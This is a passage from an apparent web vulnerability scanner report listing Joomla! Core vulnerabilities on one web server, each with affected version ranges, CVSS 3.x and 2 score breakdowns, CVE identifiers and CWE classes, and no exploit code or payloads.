CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N

Base Score: 5.4

Attack Vector: Network

Attack Complexity: Low

Privileges Required: Low

CVSS3
User Interaction: None

Scope: Unchanged

Confidentiality Impact: Low

Integrity Impact: Low

Availability Impact: None

54
Base Score: 5.5

Access Vector: Network_accessible

Access Complexity: Low

Authentication: Single

Confidentiality Impact: Partial

Integrity Impact: Partial

Availability Impact: None

CVSS2 Exploitability: High

Remediation Level: Official_fix

Report Confidence: Confirmed

Availability Requirement: Not_defined

Collateral Damage Potential: Not_defined

Confidentiality Requirement: Not_defined

Integrity Requirement: Not_defined

Target Distribution: Not_defined

CVE CVE-2021-23123
CWE CWE-264
Affected items Variation
Web Server 1

Joomla! Core 3.x.x Security Bypass (3.0.0 - 3.9.24)

Classification
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N

Base Score: 4.3

Attack Vector: Network

Attack Complexity: Low

Privileges Required: Low

CVSS3
User Interaction: None

Scope: Unchanged

Confidentiality Impact: None

Integrity Impact: Low

Availability Impact: None

Base Score: 4.0

Access Vector: Network_accessible

Access Complexity: Low

Authentication: Single

Confidentiality Impact: None

Integrity Impact: Partial

Availability Impact: None

CVSS2 Exploitability: High

Remediation Level: Official_fix

Report Confidence: Confirmed

Availability Requirement: Not_defined

Collateral Damage Potential: Not_defined

Confidentiality Requirement: Not_defined

Integrity Requirement: Not_defined

Target Distribution: Not_defined

CVE CVE-2021-26027
CWE CWE-264
Affected items Variation
Web Server 1

Joomla! Core 3.x.x Security Bypass (3.1.0 - 3.8.12)

Classification

55
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N

Base Score: 4.3

Attack Vector: Network

Attack Complexity: Low

Privileges Required: Low

CVSS3
User Interaction: None

Scope: Unchanged

Confidentiality Impact: None

Integrity Impact: Low

Availability Impact: None

Base Score: 3.5

Access Vector: Network_accessible

Access Complexity: Medium

Authentication: Single

Confidentiality Impact: None

Integrity Impact: Partial

Availability Impact: None

CVSS2 Exploitability: High

Remediation Level: Official_fix

Report Confidence: Confirmed

Availability Requirement: Not_defined

Collateral Damage Potential: Not_defined

Confidentiality Requirement: Not_defined

Integrity Requirement: Not_defined

Target Distribution: Not_defined

CVE CVE-2018-17857
CWE CWE-264
Affected items Variation
Web Server 1

Joomla! Core 3.x.x Security Bypass (3.2.0 - 3.8.1)

Classification
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

Base Score: 5.3

Attack Vector: Network

Attack Complexity: Low

Privileges Required: None

CVSS3
User Interaction: None

Scope: Unchanged

Confidentiality Impact: None

Integrity Impact: Low

Availability Impact: None

56
Base Score: 5.0

Access Vector: Network_accessible

Access Complexity: Low

Authentication: None

Confidentiality Impact: None

Integrity Impact: Partial

Availability Impact: None

CVSS2 Exploitability: High

Remediation Level: Official_fix

Report Confidence: Confirmed

Availability Requirement: Not_defined

Collateral Damage Potential: Not_defined

Confidentiality Requirement: Not_defined

Integrity Requirement: Not_defined

Target Distribution: Not_defined

CVE CVE-2017-16634
CWE CWE-287
Affected items Variation
Web Server 1

Joomla! Core 3.x.x Security Bypass (3.2.0 - 3.9.24)

Classification
CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:L/A:N

Base Score: 3.1

Attack Vector: Network

Attack Complexity: High

Privileges Required: Low

CVSS3
User Interaction: None

Scope: Unchanged

Confidentiality Impact: None

Integrity Impact: Low

Availability Impact: None

Base Score: 2.1

Access Vector: Network_accessible

Access Complexity: High

Authentication: Single

Confidentiality Impact: None

Integrity Impact: Partial

Availability Impact: None

CVSS2 Exploitability: High

Remediation Level: Official_fix

Report Confidence: Confirmed

Availability Requirement: Not_defined

Collateral Damage Potential: Not_defined

Confidentiality Requirement: Not_defined

Integrity Requirement: Not_defined

Target Distribution: Not_defined

CVE CVE-2021-23128
CWE CWE-264
Affected items Variation
Web Server 1

Joomla! Core 3.x.x Security Bypass (3.2.0 - 3.9.24)

Classification

57
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N

Base Score: 4.3

Attack Vector: Network

Attack Complexity: Low

Privileges Required: Low

CVSS3
User Interaction: None

Scope: Unchanged

Confidentiality Impact: None

Integrity Impact: Low

Availability Impact: None

Base Score: 4.0

Access Vector: Network_accessible

Access Complexity: Low

Authentication: Single

Confidentiality Impact: None

Integrity Impact: Partial

Availability Impact: None

CVSS2 Exploitability: High

Remediation Level: Official_fix

Report Confidence: Confirmed

Availability Requirement: Not_defined

Collateral Damage Potential: Not_defined

Confidentiality Requirement: Not_defined

Integrity Requirement: Not_defined

Target Distribution: Not_defined

CVE CVE-2021-23131
CWE CWE-264
Affected items Variation
Web Server 1

Joomla! Core 3.x.x Security Bypass (3.2.0 - 3.9.24)

Classification
CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:L/A:N

Base Score: 3.1

Attack Vector: Network

Attack Complexity: High

Privileges Required: Low

CVSS3
User Interaction: None

Scope: Unchanged

Confidentiality Impact: None

Integrity Impact: Low

Availability Impact: None

58
Base Score: 2.1

Access Vector: Network_accessible

Access Complexity: High

Authentication: Single

Confidentiality Impact: None

Integrity Impact: Partial

Availability Impact: None

CVSS2 Exploitability: High

Remediation Level: Official_fix

Report Confidence: Confirmed

Availability Requirement: Not_defined

Collateral Damage Potential: Not_defined

Confidentiality Requirement: Not_defined

Integrity Requirement: Not_defined

Target Distribution: Not_defined

CVE CVE-2021-23126
CVE CVE-2021-23127
CWE CWE-264
Affected items Variation
Web Server 1

Joomla! Core 3.x.x Security Bypass (3.2.0 - 3.9.4)

Classification
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

Base Score: 5.3

Attack Vector: Network

Attack Complexity: Low

Privileges Required: None

CVSS3
User Interaction: None

Scope: Unchanged

Confidentiality Impact: None

Integrity Impact: Low

Availability Impact: None

Base Score: 5.0

Access Vector: Network_accessible

Access Complexity: Low

Authentication: None

Confidentiality Impact: None

Integrity Impact: Partial

Availability Impact: None

CVSS2 Exploitability: High

Remediation Level: Official_fix

Report Confidence: Confirmed

Availability Requirement: Not_defined

Collateral Damage Potential: Not_defined

Confidentiality Requirement: Not_defined

Integrity Requirement: Not_defined

Target Distribution: Not_defined

CVE CVE-2019-10946
CWE CWE-264
Affected items Variation
Web Server 1

Joomla! Core 3.x.x SQL Injection (3.0.0 - 3.9.22)

59
Classification
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:L

Base Score: 7.4

Attack Vector: Network

Attack Complexity: Low

Privileges Required: Low

CVSS3
User Interaction: None

Scope: Changed

Confidentiality Impact: Low

Integrity Impact: Low

Availability Impact: Low

Base Score: 6.5

Access Vector: Network_accessible

Access Complexity: Low

Authentication: Single

Confidentiality Impact: Partial

Integrity Impact: Partial

Availability Impact: Partial

CVSS2 Exploitability: High

Remediation Level: Official_fix

Report Confidence: Confirmed

Availability Requirement: Not_defined

Collateral Damage Potential: Not_defined

Confidentiality Requirement: Not_defined

Integrity Requirement: Not_defined

Target Distribution: Not_defined

CVE CVE-2020-35613
CWE CWE-89
Affected items Variation
Web Server 1

Joomla! Core 3.x.x SQL Injection (3.5.0 - 3.8.5)

Classification
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:L

Base Score: 7.4

Attack Vector: Network

Attack Complexity: Low

Privileges Required: Low

CVSS3
User Interaction: None

Scope: Changed

Confidentiality Impact: Low

Integrity Impact: Low

Availability Impact: Low

60
Base Score: 6.5

Access Vector: Network_accessible

Access Complexity: Low

Authentication: Single

Confidentiality Impact: Partial

Integrity Impact: Partial

Availability Impact: Partial

CVSS2 Exploitability: Proof_of_concept

Remediation Level: Official_fix

Report Confidence: Confirmed

Availability Requirement: Not_defined

Collateral Damage Potential: Not_defined

Confidentiality Requirement: Not_defined

Integrity Requirement: Not_defined

Target Distribution: Not_defined

CVE CVE-2018-8045
CWE CWE-89
Affected items Variation
Web Server 1

Joomla! Core Arbitrary File Upload (2.5.0 - 3.8.7)

Classification
CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:L/I:L/A:L

Base Score: 6.0

Attack Vector: Network

Attack Complexity: High

Privileges Required: Low

CVSS3
User Interaction: None

Scope: Changed

Confidentiality Impact: Low

Integrity Impact: Low

Availability Impact: Low

Base Score: 6.0

Access Vector: Network_accessible

Access Complexity: Medium

Authentication: Single

Confidentiality Impact: Partial

Integrity Impact: Partial

Availability Impact: Partial

CVSS2 Exploitability: High

Remediation Level: Official_fix

Report Confidence: Confirmed

Availability Requirement: Not_defined

Collateral Damage Potential: Not_defined

Confidentiality Requirement: Not_defined

Integrity Requirement: Not_defined

Target Distribution: Not_defined

CVE CVE-2018-11322
CWE CWE-434
Affected items Variation
Web Server 1

Joomla! Core Cross-Site Scripting (1.0.0 - 3.9.2)

Classification

61
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:N/I:L/A:N

Base Score: 4.1

Attack Vector: Network

Attack Complexity: Low

Privileges Required: Low

CVSS3
User Interaction: Required

Scope: Changed

Confidentiality Impact: None

Integrity Impact: Low

Availability Impact: None

Base Score: 3.5

Access Vector: Network_accessible

Access Complexity: Medium

Authentication: Single

Confidentiality Impact: None

Integrity Impact: Partial

Availability Impact: None

CVSS2 Exploitability: High

Remediation Level: Official_fix

Report Confidence: Confirmed

Availability Requirement: Not_defined

Collateral Damage Potential: Not_defined

Confidentiality Requirement: Not_defined

Integrity Requirement: Not_defined

Target Distribution: Not_defined

CVE CVE-2019-7742
CWE CWE-79
Affected items Variation
Web Server 1

Joomla! Core Cross-Site Scripting (1.5.0 - 3.7.3)

Classification
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:L/A:N

Base Score: 4.7

Attack Vector: Network

Attack Complexity: Low

Privileges Required: None

CVSS3
User Interaction: Required

Scope: Changed

Confidentiality Impact: None

Integrity Impact: Low

Availability Impact: None

62
Base Score: 4.3

Access Vector: Network_accessible

Access Complexity: Medium

Authentication: None

Confidentiality Impact: None

Integrity Impact: Partial

Availability Impact: None

CVSS2 Exploitability: High

Remediation Level: Official_fix

Report Confidence: Confirmed

Availability Requirement: Not_defined

Collateral Damage Potential: Not_defined

Confidentiality Requirement: Not_defined

Integrity Requirement: Not_defined

Target Distribution: Not_defined

CVE CVE-2017-11612
CWE CWE-79
Affected items Variation
Web Server 1

Joomla! Core Cross-Site Scripting (1.5.0 - 3.8.3)

Classification
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:L/A:N

Base Score: 4.7

Attack Vector: Network

Attack Complexity: Low

Privileges Required: None

CVSS3
User Interaction: Required

Scope: Changed

Confidentiality Impact: None

Integrity Impact: Low

Availability Impact: None

Base Score: 4.3

Access Vector: Network_accessible

Access Complexity: Medium

Authentication: None

Confidentiality Impact: None

Integrity Impact: Partial

Availability Impact: None

CVSS2 Exploitability: Proof_of_concept

Remediation Level: Official_fix

Report Confidence: Confirmed

Availability Requirement: Not_defined

Collateral Damage Potential: Not_defined

Confidentiality Requirement: Not_defined

Integrity Requirement: Not_defined

Target Distribution: Not_defined

CVE CVE-2018-6379
CWE CWE-79
Affected items Variation
Web Server 1

Joomla! Core Cross-Site Scripting (1.6.0 - 3.8.8)

Classification

63
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:L/A:N

Base Score: 4.7

Attack Vector: Network

Attack Complexity: Low

Privileges Required: None

CVSS3
User Interaction: Required

Scope: Changed

Confidentiality Impact: None

Integrity Impact: Low

Availability Impact: None

Base Score: 4.3

Access Vector: Network_accessible

Access Complexity: Medium

Authentication: None

Confidentiality Impact: None

Integrity Impact: Partial

Availability Impact: None

CVSS2 Exploitability: High

Remediation Level: Official_fix

Report Confidence: Confirmed

Availability Requirement: Not_defined

Collateral Damage Potential: Not_defined

Confidentiality Requirement: Not_defined

Integrity Requirement: Not_defined

Target Distribution: Not_defined

CVE CVE-2018-12711
CWE CWE-79
Affected items Variation
Web Server 1

Joomla! Core Cross-Site Scripting (1.7.0 - 3.9.5)

Classification
CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Base Score: 6.1

Attack Vector: Network

Attack Complexity: Low

Privileges Required: None

CVSS3
User Interaction: Required

Scope: Changed

Confidentiality Impact: Low

Integrity Impact: Low

Availability Impact: None

64
Base Score: 4.3

Access Vector: Network_accessible

Access Complexity: Medium

Authentication: None

Confidentiality Impact: None

Integrity Impact: Partial

Availability Impact: None

CVSS2 Exploitability: High

Remediation Level: Official_fix

Report Confidence: Confirmed

Availability Requirement: Not_defined

Collateral Damage Potential: Not_defined

Confidentiality Requirement: Not_defined

Integrity Requirement: Not_defined

Target Distribution: Not_defined

CVE CVE-2019-11809
CWE CWE-79
Affected items Variation
Web Server 1

Joomla! Core Cross-Site Scripting (2.5.0 - 3.9.24)

Classification
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:N/I:L/A:N

Base Score: 4.1

Attack Vector: Network

Attack Complexity: Low

Privileges Required: Low

CVSS3
User Interaction: Required

Scope: Changed

Confidentiality Impact: None

Integrity Impact: Low

Availability Impact: None

Base Score: 3.5

Access Vector: Network_accessible

Access Complexity: Medium

Authentication: Single

Confidentiality Impact: None

Integrity Impact: Partial

Availability Impact: None

CVSS2 Exploitability: High

Remediation Level: Official_fix

Report Confidence: Confirmed

Availability Requirement: Not_defined

Collateral Damage Potential: Not_defined

Confidentiality Requirement: Not_defined

Integrity Requirement: Not_defined

Target Distribution: Not_defined

CVE CVE-2021-23129
CWE CWE-79
Affected items Variation
Web Server 1

Joomla! Core Cross-Site Scripting (2.5.0 - 3.9.24)

Classification

65
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:N/I:L/A:N

Base Score: 4.1

Attack Vector: Network

Attack Complexity: Low

Privileges Required: Low

CVSS3
User Interaction: Required

Scope: Changed

Confidentiality Impact: None

Integrity Impact: Low

Availability Impact: None

Base Score: 3.5

Access Vector: Network_accessible

Access Complexity: Medium

Authentication: Single

Confidentiality Impact: None

Integrity Impact: Partial

Availability Impact: None

CVSS2 Exploitability: High

Remediation Level: Official_fix

Report Confidence: Confirmed

Availability Requirement: Not_defined

Collateral Damage Potential: Not_defined

Confidentiality Requirement: Not_defined

Integrity Requirement: Not_defined

Target Distribution: Not_defined

CVE CVE-2021-23130
CWE CWE-79
Affected items Variation
Web Server 1

Joomla! Core Denial of Service (2.5.0 - 3.9.27)

Classification
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:N/I:N/A:L

Base Score: 5.0

Attack Vector: Network

Attack Complexity: Low

Privileges Required: Low

CVSS3
User Interaction: None

Scope: Changed

Confidentiality Impact: None

Integrity Impact: None

Availability Impact: Low

66
Base Score: 4.0

Access Vector: Network_accessible

Access Complexity: Low

Authentication: Single

Confidentiality Impact: None

Integrity Impact: None

Availability Impact: Partial

CVSS2 Exploitability: High

Remediation Level: Official_fix

Report Confidence: Confirmed

Availability Requirement: Not_defined

Collateral Damage Potential: Not_defined

Confidentiality Requirement: Not_defined

Integrity Requirement: Not_defined

Target Distribution: Not_defined

CVE CVE-2021-26036
CWE CWE-400
Affected items Variation
Web Server 1

Joomla! Core Directory Traversal (1.5.0 - 3.9.4)

Classification
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L

Base Score: 6.3

Attack Vector: Network

Attack Complexity: Low

Privileges Required: Low

CVSS3
User Interaction: None

Scope: Unchanged

Confidentiality Impact: Low

Integrity Impact: Low

Availability Impact: Low

Base Score: 6.5

Access Vector: Network_accessible

Access Complexity: Low

Authentication: Single

Confidentiality Impact: Partial

Integrity Impact: Partial

Availability Impact: Partial

CVSS2 Exploitability: Functional

Remediation Level: Official_fix

Report Confidence: Confirmed

Availability Requirement: Not_defined

Collateral Damage Potential: Not_defined

Confidentiality Requirement: Not_defined

Integrity Requirement: Not_defined

Target Distribution: Not_defined

CVE CVE-2019-10945
CWE CWE-22
Affected items Variation
Web Server 1

Joomla! Core Directory Traversal (2.5.0 - 3.9.20)

Classification

67
CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Base Score: 8.8

Attack Vector: Network

Attack Complexity: Low

Privileges Required: Low

CVSS3
User Interaction: None

Scope: Unchanged

Confidentiality Impact: High

Integrity Impact: High

Availability Impact: High

Base Score: 6.0

Access Vector: Network_accessible

Access Complexity: Medium

Authentication: Single

Confidentiality Impact: Partial

Integrity Impact: Partial

Availability Impact: Partial

CVSS2 Exploitability: High

Remediation Level: Official_fix

Report Confidence: Confirmed

Availability Requirement: Not_defined

Collateral Damage Potential: Not_defined

Confidentiality Requirement: Not_defined

Integrity Requirement: Not_defined

Target Distribution: Not_defined

CVE CVE-2020-24597
CWE CWE-22
Affected items Variation
Web Server 1

Joomla! Core Directory Traversal (2.5.0 - 3.9.22)

Classification
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N

Base Score: 4.3

Attack Vector: Network

Attack Complexity: Low

Privileges Required: Low

CVSS3
User Interaction: None

Scope: Unchanged

Confidentiality Impact: Low

Integrity Impact: None

Availability Impact: None

68
Base Score: 4.0

Access Vector: Network_accessible

Access Complexity: Low

Authentication: Single

Confidentiality Impact: Partial

Integrity Impact: None

Availability Impact: None

CVSS2 Exploitability: High

Remediation Level: Official_fix

Report Confidence: Confirmed

Availability Requirement: Not_defined

Collateral Damage Potential: Not_defined

Confidentiality Requirement: Not_defined

Integrity Requirement: Not_defined

Target Distribution: Not_defined

CVE CVE-2020-35612
CWE CWE-22
Affected items Variation
Web Server 1

Joomla! Core Information Disclosure (1.5.0 - 3.7.5)

Classification
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L

Base Score: 7.3

Attack Vector: Network

Attack Complexity: Low

Privileges Required: None

CVSS3
User Interaction: None

Scope: Unchanged

Confidentiality Impact: Low

Integrity Impact: Low

Availability Impact: Low

Base Score: 7.5

Access Vector: Network_accessible

Access Complexity: Low

Authentication: None

Confidentiality Impact: Partial

Integrity Impact: Partial

Availability Impact: Partial

CVSS2 Exploitability: High

Remediation Level: Official_fix

Report Confidence: Confirmed

Availability Requirement: Not_defined

Collateral Damage Potential: Not_defined

Confidentiality Requirement: Not_defined

Integrity Requirement: Not_defined

Target Distribution: Not_defined

CVE CVE-2017-14596
CWE CWE-200
Affected items Variation
Web Server 1

Joomla! Core Information Disclosure (1.5.0 - 3.8.1)

Classification

69
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L

Base Score: 7.3

Attack Vector: Network

Attack Complexity: Low

Privileges Required: None

CVSS3
User Interaction: None

Scope: Unchanged

Confidentiality Impact: Low

Integrity Impact: Low

Availability Impact: Low

Base Score: 7.5

Access Vector: Network_accessible

Access Complexity: Low

Authentication: None

Confidentiality Impact: Partial

Integrity Impact: Partial

Availability Impact: Partial

CVSS2 Exploitability: High

Remediation Level: Official_fix

Report Confidence: Confirmed

Availability Requirement: Not_defined

Collateral Damage Potential: Not_defined

Confidentiality Requirement: Not_defined

Integrity Requirement: Not_defined

Target Distribution: Not_defined

CVE CVE-2017-14596
CWE CWE-200
Affected items Variation
Web Server 1

Joomla! Core Information Disclosure (2.5.0 - 3.9.22)

Classification
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Base Score: 5.3

Attack Vector: Network

Attack Complexity: Low

Privileges Required: None

CVSS3
User Interaction: None

Scope: Unchanged

Confidentiality Impact: Low

Integrity Impact: None

Availability Impact: None

70
Base Score: 5.0

Access Vector: Network_accessible

Access Complexity: Low

Authentication: None

Confidentiality Impact: Partial

Integrity Impact: None

Availability Impact: None

CVSS2 Exploitability: High

Remediation Level: Official_fix

Report Confidence: Confirmed

Availability Requirement: Not_defined

Collateral Damage Potential: Not_defined

Confidentiality Requirement: Not_defined

Integrity Requirement: Not_defined

Target Distribution: Not_defined

CVE CVE-2020-35611
CWE CWE-200
Affected items Variation
Web Server 1

Joomla! Core Information Disclosure (2.5.0 - 3.9.22)

Classification
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Base Score: 5.3

Attack Vector: Network

Attack Complexity: Low

Privileges Required: None

CVSS3
User Interaction: None

Scope: Unchanged

Confidentiality Impact: Low

Integrity Impact: None

Availability Impact: None

Base Score: 5.0

Access Vector: Network_accessible

Access Complexity: Low

Authentication: None

Confidentiality Impact: Partial

Integrity Impact: None

Availability Impact: None

CVSS2 Exploitability: High

Remediation Level: Official_fix

Report Confidence: Confirmed

Availability Requirement: Not_defined

Collateral Damage Potential: Not_defined

Confidentiality Requirement: Not_defined

Integrity Requirement: Not_defined

Target Distribution: Not_defined

CVE CVE-2020-35610
CWE CWE-200
Affected items Variation
Web Server 1

Joomla! Core Local File Inclusion (2.5.0 - 3.8.8)

Classification

71
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N

Base Score: 5.8

Attack Vector: Network

Attack Complexity: Low

Privileges Required: None

CVSS3
User Interaction: None

Scope: Changed

Confidentiality Impact: Low

Integrity Impact: None

Availability Impact: None

Base Score: 5.0

Access Vector: Network_accessible

Access Complexity: Low

Authentication: None

Confidentiality Impact: Partial

Integrity Impact: None

Availability Impact: None

CVSS2 Exploitability: High

Remediation Level: Official_fix

Report Confidence: Confirmed

Availability Requirement: Not_defined

Collateral Damage Potential: Not_defined

Confidentiality Requirement: Not_defined

Integrity Requirement: Not_defined

Target Distribution: Not_defined

CVE CVE-2018-12712
CWE CWE-22
Affected items Variation
Web Server 1

Joomla! Core Multiple Cross-Site Scripting Vulnerabilities (1.5.0 - 3.8.7)

Classification
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:L/A:N

Base Score: 4.7

Attack Vector: Network

Attack Complexity: Low

Privileges Required: None

CVSS3
User Interaction: Required

Scope: Changed

Confidentiality Impact: None

Integrity Impact: Low

Availability Impact: None

72
Base Score: 4.3

Access Vector: Network_accessible

Access Complexity: Medium

Authentication: None

Confidentiality Impact: None

Integrity Impact: Partial

Availability Impact: None

CVSS2 Exploitability: High

Remediation Level: Official_fix

Report Confidence: Confirmed

Availability Requirement: Not_defined

Collateral Damage Potential: Not_defined

Confidentiality Requirement: Not_defined

Integrity Requirement: Not_defined

Target Distribution: Not_defined

CVE CVE-2018-6378
CWE CWE-79
Affected items Variation
Web Server 1

Joomla! Core Multiple Cross-Site Scripting Vulnerabilities (2.5.0 - 3.9.1)

Classification
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:N/I:L/A:N

Base Score: 4.1

Attack Vector: Network

Attack Complexity: Low

Privileges Required: Low

CVSS3
User Interaction: Required

Scope: Changed

Confidentiality Impact: None

Integrity Impact: Low

Availability Impact: None

Base Score: 3.5

Access Vector: Network_accessible

Access Complexity: Medium

Authentication: Single

Confidentiality Impact: None

Integrity Impact: Partial

Availability Impact: None

CVSS2 Exploitability: Proof_of_concept

Remediation Level: Official_fix

Report Confidence: Confirmed

Availability Requirement: Not_defined

Collateral Damage Potential: Not_defined

Confidentiality Requirement: Not_defined

Integrity Requirement: Not_defined

Target Distribution: Not_defined

CVE CVE-2019-6261
CVE CVE-2019-6262
CVE CVE-2019-6263
CVE CVE-2019-6264
CWE CWE-79
Affected items Variation

73
Web Server 1

Joomla! Core Multiple SQL Injection Vulnerabilities (2.5.0 - 3.9.13)

Classification
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L

Base Score: 8.3

Attack Vector: Network

Attack Complexity: Low

Privileges Required: None

CVSS3
User Interaction: None

Scope: Changed

Confidentiality Impact: Low

Integrity Impact: Low

Availability Impact: Low

Base Score: 7.5

Access Vector: Network_accessible

Access Complexity: Low

Authentication: None

Confidentiality Impact: Partial

Integrity Impact: Partial

Availability Impact: Partial

CVSS2 Exploitability: High

Remediation Level: Official_fix

Report Confidence: Confirmed

Availability Requirement: Not_defined

Collateral Damage Potential: Not_defined

Confidentiality Requirement: Not_defined

Integrity Requirement: Not_defined

Target Distribution: Not_defined

CVE CVE-2019-19846
CWE CWE-89
Affected items Variation
Web Server 1

Joomla! Core Multiple Vulnerabilities (1.5.0 - 3.7.2)

Classification
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L

Base Score: 6.5

Attack Vector: Network

Attack Complexity: Low

Privileges Required: Low

CVSS3
User Interaction: Required

Scope: Changed

Confidentiality Impact: Low

Integrity Impact: Low

Availability Impact: Low

74
Base Score: 6.5

Access Vector: Network_accessible

Access Complexity: Low

Authentication: Single

Confidentiality Impact: Partial

Integrity Impact: Partial

Availability Impact: Partial

CVSS2 Exploitability: Functional

Remediation Level: Official_fix

Report Confidence: Confirmed

Availability Requirement: Not_defined

Collateral Damage Potential: Not_defined

Confidentiality Requirement: Not_defined

Integrity Requirement: Not_defined

Target Distribution: Not_defined

CVE CVE-2017-7983
CVE CVE-2017-7985
CVE CVE-2017-7986
CWE CWE-79
CWE CWE-200
Affected items Variation
Web Server 1

Joomla! Core Multiple Vulnerabilities (1.5.0 - 3.8.11)

Classification
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L

Base Score: 6.5

Attack Vector: Network

Attack Complexity: Low

Privileges Required: Low

CVSS3
User Interaction: Required

Scope: Changed

Confidentiality Impact: Low

Integrity Impact: Low

Availability Impact: Low

Base Score: 6.0

Access Vector: Network_accessible

Access Complexity: Medium

Authentication: Single

Confidentiality Impact: Partial

Integrity Impact: Partial

Availability Impact: Partial

CVSS2 Exploitability: High

Remediation Level: Official_fix

Report Confidence: Confirmed

Availability Requirement: Not_defined

Collateral Damage Potential: Not_defined

Confidentiality Requirement: Not_defined

Integrity Requirement: Not_defined

Target Distribution: Not_defined

CVE CVE-2018-15880
CVE CVE-2018-15882
CWE CWE-79

75
CWE CWE-434
Affected items Variation
Web Server 1

Joomla! Core Multiple Vulnerabilities (1.7.3 - 3.7.2)

Classification
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Base Score: 6.1

Attack Vector: Network

Attack Complexity: Low

Privileges Required: None

CVSS3
User Interaction: Required

Scope: Changed

Confidentiality Impact: Low

Integrity Impact: Low

Availability Impact: None

Base Score: 6.4

Access Vector: Network_accessible

Access Complexity: Low

Authentication: None

Confidentiality Impact: Partial

Integrity Impact: Partial

Availability Impact: None

CVSS2 Exploitability: Proof_of_concept

Remediation Level: Official_fix

Report Confidence: Confirmed

Availability Requirement: Not_defined

Collateral Damage Potential: Not_defined

Confidentiality Requirement: Not_defined

Integrity Requirement: Not_defined

Target Distribution: Not_defined

CVE CVE-2017-9933
CVE CVE-2017-9934
CWE CWE-79
CWE CWE-200
Affected items Variation
Web Server 1

Joomla! Core Multiple Vulnerabilities (2.5.0 - 3.8.12)

Classification
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N

Base Score: 4.3

Attack Vector: Network

Attack Complexity: Low

Privileges Required: None

CVSS3
User Interaction: Required

Scope: Unchanged

Confidentiality Impact: None

Integrity Impact: Low

Availability Impact: None

76
Base Score: 5.0

Access Vector: Network_accessible

Access Complexity: Low

Authentication: None

Confidentiality Impact: None

Integrity Impact: Partial

Availability Impact: None

CVSS2 Exploitability: High

Remediation Level: Official_fix

Report Confidence: Confirmed

Availability Requirement: Not_defined

Collateral Damage Potential: Not_defined

Confidentiality Requirement: Not_defined

Integrity Requirement: Not_defined

Target Distribution: Not_defined

CVE CVE-2018-17858
CVE CVE-2018-17859
CWE CWE-264
CWE CWE-352
Affected items Variation
Web Server 1

Joomla! Core Multiple Vulnerabilities (2.5.0 - 3.9.2)

Classification
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L

Base Score: 6.5

Attack Vector: Network

Attack Complexity: Low

Privileges Required: Low

CVSS3
User Interaction: Required

Scope: Changed

Confidentiality Impact: Low

Integrity Impact: Low

Availability Impact: Low

Base Score: 6.0

Access Vector: Network_accessible

Access Complexity: Medium

Authentication: Single

Confidentiality Impact: Partial

Integrity Impact: Partial

Availability Impact: Partial

CVSS2 Exploitability: High

Remediation Level: Official_fix

Report Confidence: Confirmed

Availability Requirement: Not_defined

Collateral Damage Potential: Not_defined

Confidentiality Requirement: Not_defined

Integrity Requirement: Not_defined

Target Distribution: Not_defined

CVE CVE-2019-7739
CVE CVE-2019-7740
CVE CVE-2019-7741
CVE CVE-2019-7743

77
CVE CVE-2019-7744
CWE CWE-79
CWE CWE-915
Affected items Variation
Web Server 1

Joomla! Core PHP Object Injection (2.5.4 - 3.8.12)

Classification
CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:L

Base Score: 5.0

Attack Vector: Network

Attack Complexity: High

Privileges Required: Low

CVSS3
User Interaction: None

Scope: Unchanged

Confidentiality Impact: Low

Integrity Impact: Low

Availability Impact: Low

Base Score: 6.0

Access Vector: Network_accessible

Access Complexity: Medium

Authentication: Single

Confidentiality Impact: Partial

Integrity Impact: Partial

Availability Impact: Partial

CVSS2 Exploitability: High

Remediation Level: Official_fix

Report Confidence: Confirmed

Availability Requirement: Not_defined

Collateral Damage Potential: Not_defined

Confidentiality Requirement: Not_defined

Integrity Requirement: Not_defined

Target Distribution: Not_defined

CVE CVE-2018-17856
CWE CWE-915
Affected items Variation
Web Server 1

Joomla! Core Security Bypass (1.5.0 - 3.8.12)

Classification
